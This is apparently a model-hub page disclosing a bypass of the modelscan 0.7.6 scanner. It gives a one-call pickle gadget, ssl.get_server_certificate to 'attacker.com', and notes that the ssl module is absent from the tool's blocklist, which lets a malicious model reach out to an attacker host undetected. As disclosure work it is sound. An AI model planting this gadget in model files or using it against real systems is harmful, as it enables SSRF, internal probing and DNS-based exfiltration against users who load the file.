Modelscan Bypass: ssl.get_server_certificate SSRF

Summary

Bypasses modelscan 0.7.6 while making TLS connections to arbitrary servers (SSRF).

Chain

ssl.get_server_certificate(("attacker.com", 443)) - DNS resolution + TCP + TLS handshake to attacker-controlled server.

Why It Works

ssl module NOT in modelscan blocklist
Only httplib (Python 2) is blocked, not ssl
Single function call, no chaining needed

Impact

SSRF via TLS - DNS resolution, TCP connection, TLS handshake to attacker. Can probe internal network services, trigger DNS callbacks for data exfiltration.

Modelscan Result

No issues found!

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support